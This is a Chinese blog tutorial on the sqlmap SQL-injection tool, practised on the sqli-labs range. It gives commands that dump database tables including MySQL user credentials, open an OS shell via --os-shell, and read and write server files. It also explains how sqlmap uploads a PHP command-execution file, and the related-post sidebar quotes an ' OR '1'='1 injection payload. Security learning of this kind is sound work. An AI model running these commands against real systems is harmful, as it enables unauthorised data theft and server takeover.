sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势

最新推荐文章于 2024-05-02 01:04:40 发布
最新推荐文章于 2024-05-02 01:04:40 发布
阅读量2.4k 收藏 15
点赞数 2
文章标签: sql 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67473072/article/details/131918464
版权

目录

0x01 学习目标

1.学会sqlmap工具的使用方法,并理解sqlmap常见参数的意义。

2.如何传输post请求包并进行利用

3.  如何指定只探测某一种注入类型,比如指定只探测是否存在布尔盲注

4. 如何指定 随机的user-agent

5.  如何刷新之前的记录重新探测某个数据包是否存在注入

6. 如何指定post包中的某个参数,只对这个参数进行探测

7.  如何提升sql注入漏洞探测等级

8. 如何让sqlmap发送的探测数据包经过burpsuite,并观察sqlmap发送的数据包

9. 参数--os-shell 和--sql-shell 分别代表什么

10. 如何让sqlmap探测漏洞时显示每次发包的payload是什么

0x02 sqlmap的基本用法

0x03 使用sqlmap工具读写文件

1.文件读取

2. 文件写入

0x04 总结

0x01 学习目标

1.学会sqlmap工具的使用方法,并理解sqlmap常见参数的意义。

sqlmap工具常见参数及其意义:

  • -r 读取抓包文件

  • -p 需要检测的参数

  • --technique 需要检测的注入方式

    eg:sqlmap -u "http://URL/?id=1" --dbs --batch --technique B

    • B:Boolean-based-blind (布尔型注入)

    • U:Union query-based (联合注入)

    • E:Error-based (报错型注入)

    • S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

    • T:Time-based blind (基于时间延迟注入)

  • --batch 默认选择

  • --threads 线程数

  • -data 传入post参数(免去抓包)

  • --dbs 爆破数据库

获取数据库的常用参数

-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--tables 列出当前的表
--columns 列出当前的列
--dump 获取字段中的数据

2.如何传输post请求包并进行利用

通过 "-r" 参数传递 POST 请求包,例如:sqlmap -r request.txt。 (本文是对sqli靶场进行测试的)下面将利用该参数进行注入检查。

2.1 通过burpsuit抓取数据包导入进sqlmap进行注入检测

使用sqlmap载入导出的数据包并进行注入检测

2.2 查询注入点

sqlmap.py -r request.txt

 2.3 查询数据库

sqlmap.py -r request.txt --dbs

 2.4 查询指定数据库的表

sqlmap.py -r request.txt -D mysql --tables

2.5  查询指定数据库指定表的指定字段

sqlmap.py -r request.txt -D mysql -T user --columns

2.6  查询指定数据库指定表的指定字段的数据:

sqlmap.py -r request.txt -D mysql -T user -C User --dump

3.  如何指定只探测某一种注入类型,比如指定只探测是否存在布尔盲注

使用 --technique 参数来指定探测的 SQL 注入类型。例如,如果你只想探测 UNION-based 注入,可以使用以下命令:

 sqlmap.py -u "http://example.com/?y=x" --technique U

其中,-u 参数表示目标 URL,--technique 参数后面的 U 表示 UNION-based 注入。除了 U,还可以指定其他类型的注入方式,如 B(布尔盲注)、E(错误信息注入)等。如果要指定多种注入类型,可以使用逗号分隔,如 -technique U,B 表示探测 UNION-based 和布尔盲注类型的注入。

 使用 "--technique=B" 参数指定只探测布尔盲注,例如:

sqlmap.py -u "http://example.com/?y=x" --technique=B。

eg:

 4. 如何指定 随机的user-agent

随机 User-Agent 的命令:sqlmap.py -u "http://example.com/index.php?id=1" --random-agent该命令中使用了 "--random-agent" 参数来指定随机 User-Agent,这样每次分析请求时,Sqlmap 都会随机选择一个 User-Agent 作为当前请求的 User-Agent。

eg:

5.  如何刷新之前的记录重新探测某个数据包是否存在注入

通过 "-f" 参数强制重新探测之前的记录,例如:sqlmap -r request.txt -f。

 6. 如何指定post包中的某个参数,只对这个参数进行探测

使用 "-p" 参数指定只对 POST 参数进行探测,例如:sqlmap -r request.txt -p "username"。

7.  如何提升sql注入漏洞探测等级

 使用 "--level" 参数提升探测等级,例如:sqlmap.py -u "[http://example.com](http://example.com/)" --level=3。

Sqlmap 的参数 --level ,它共分为 5 个等级:
--level 1:即默认模式,当你不使用这个参数时,默认 level 为1,该情况下能够测试的返回很小,使用的 payload 很少。
--level 2 或者更高时:Sqlmap 会检测 cookie 是否存在注入。
--level 3 或者更高时:Sqlmap 会检测 User-Agent 或者 Referer(也属于头部信息) 是否存在注入。
--level 5:Sqlmap 会检测 Host 是否存在注入。

eg:

8. 如何让sqlmap发送的探测数据包经过burpsuite,并观察sqlmap发送的数据包

使用 "--proxy" 参数指定使用 Burp Suite 代理进行探测,例如:sqlmap.py -u "http://example.com/" --proxy=http://127.0.0.1:8080/。

 9. 参数--os-shell 和--sql-shell 分别代表什么

"--os-shell" 参数指定获取操作系统的命令行 shell,"--sql-shell" 指定获取 SQL Shell,例如:sqlmap.py -u "http://example.com" --os-shell。

前提:MySQL my.ini配置文件secure_file_priv要为空

步骤:首先查看MySQL中my.ini配置文件secure_file_priv是否为空,若不为空再文件中添加secure_file_priv="";添加后重启phpstudy再连接navicat查看是否是否修改成功(show global variables like '%secure%';)如图:

 然后执行命令:Python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -v 3 --os-shell

 原理:在指定路径上传一个php文件(如tmpucjis.php)文件内容编码为十六进制,主要实现了文件上传的功能。

 把tmpblqoi.php文件上传到指定路径该文件主要功能是执行系统命令从而与工具os-shell>模块相对应。

 10. 如何让sqlmap探测漏洞时显示每次发包的payload是什么

在 Sqlmap 命令中添加-v 选项,来使 Sqlmap 显示每次发包的负载(payload)信息。例如:

sqlmap.py -u http://example.com/vuln_page.php?id=1 -v 3

其中,"-u" 选项指定要测试的目标 URL,"-v 3" 则是启用调试模式  

0x02 sqlmap的基本用法

  1. 扫描目标网站,确定是否存在 SQL 注入漏洞:sqlmap -u <URL> --dbs

  2. 列出目标网站的所有数据库:sqlmap -u <URL> -D mysql --tables

  3. 列出指定数据库中的所有数据表:sqlmap -u <URL> -D mysql -T user --columns

  4. 列出指定数据表中的所有列:sqlmap -u <URL> -D mysql -T user -C username,password --dump

  5. 获取完整的数据库数据:sqlmap -u <URL> -D mysql --dump

  6. 执行系统命令:sqlmap -u <URL> --os-shell

  7. 获取当前用户: sqlmap -u <URL> --current-user

  8. 获取当前数据库: sqlmap -u <URL> --current-db

0x03 使用sqlmap工具读写文件

1.文件读取

sqlmap -u "http://example/example.php?id=1" --file-read "E:\mm.php"

2. 文件写入

sqlmap -u "http://example/example.php?id=1" --file-write "/home/bb/1.txt" --file-dest "E:\sql2.php" --batch

0x04 总结

下载链接:sqlmap: automatic SQL injection and database takeover tool

鉴于个人实力有限,若有错误还望指正。

星易辰
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全SQL注入工具使用指南, 该工具在windows平台与linux平台下均可以使用数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞
Sqlmap用法详解
12-02
非常使用Sqlmap使用方法详细介绍,欢迎大家下载学习
常见寻找 SQL 注入漏洞方法总结
Flag少侠的博客
04-04 1295
在WHERE子句中,使用了一个条件:category='bikes' OR '1'='1'。这个条件的目的是返回所有category为'bikes'的记录,同时也使用了OR逻辑运算符和'1'='1'条件。'1'='1'始终为真,因此这个条件始终成立,导致查询结果返回了所有记录,而不仅仅是category为'bikes'的记录。这是可以预料到的结果。注入 attacker'很明显会产生错误,因为末尾增加了多余的单引号,这导致该 SQL语句出错,但是可以尝试不同的风格,例如 ’bike‘ or '1'='1。
SQLMAP 注入教程
General的 CSDN 博客
11-15 5091
SQLMAP SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统。 当给SQLMAP这么一个url的时候,它会: 判断可注入的参数 判断可以用那种SQL 注入技术来注入 识别出哪种数据
Sqlmap使用教程【超全】
MickeyMouse1928的博客
05-11 7245
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
sqlmap工具基本使用检测sql注入
m0_37570494的博客
01-25 6019
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入: sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
sqlmap漏洞扫描使用教程(入门+图文)
java
03-09 2616
sqlmap工具初级使用教程(入门+图文)
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 7357
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
SQL注入测试工具SQLmap使用方法
weixin_45811834的博客
06-15 1511
SQLmap是一个自动化SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在命令提示符中,使用cd命令进入SQLmap所在的目录。这个命令将向Web应用程序发送一个带有注入参数的请求,SQLmap会自动检测和利用SQL注入漏洞,并尝试获取数据库名。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在Windows中,按下Win+R,输入cmd并回车,打开命令提示符。
利用SQLmap实现 SQL 注入
m0_71805735的博客
06-21 2057
利用SQLmap实现 SQL 注入
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3214
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
ibatis sqlmap配置详解
01-09
SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的...Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL使用sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为sqlMapConfig.xml
sqlmap手册.zip
06-09
sqlmap用户手册,sqlmap命令详解,多文档,更详细 1. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0 2. ./sqlmap.py -u ...
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 SQL 注入高级 SQL 工具篇 ...SQL 注入实战篇 - Thinkphp 框架 3.2.x sql 注入漏洞分析 ThinkPHP框架 < 5.0.16 sql注入漏洞分析 宽字节注入详解
SQL Server的基本操作示例
weixin_58566539的博客
04-29 510
SQL Server的基本操作示例
常用SQL命令
最新发布
wenxiaoba的博客
05-02 941
常用SQL语句使用说明和示例
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
keyboard专栏
04-28 499
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL底层执行过程
qq_14886109的博客
04-28 911
SQL底层执行过程,INNODB,二阶段提交
优化SQL的方法
weixin_44139651的博客
04-26 1485
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
sqlmap使用教程sql注入
08-17
为了防止任何非法行为和安全问题,我不能提供sqlmap的详细教程。sqlmap是一种用于检测和利用SQL注入漏洞工具,它可以帮助安全测试人员或研究人员识别并利用存在于Web应用程序中的SQL注入漏洞。然而,使用sqlmap进行未经授权的测试是非法的,并且可能导致法律后果。如果您对SQL注入感兴趣,我建议您学习有关Web应用程序安全SQL注入的基础知识,并且仅在合法和道德的环境中使用这些技术。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入sqlmap入门教程](https://blog.csdn.net/m0_56634355/article/details/124058943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值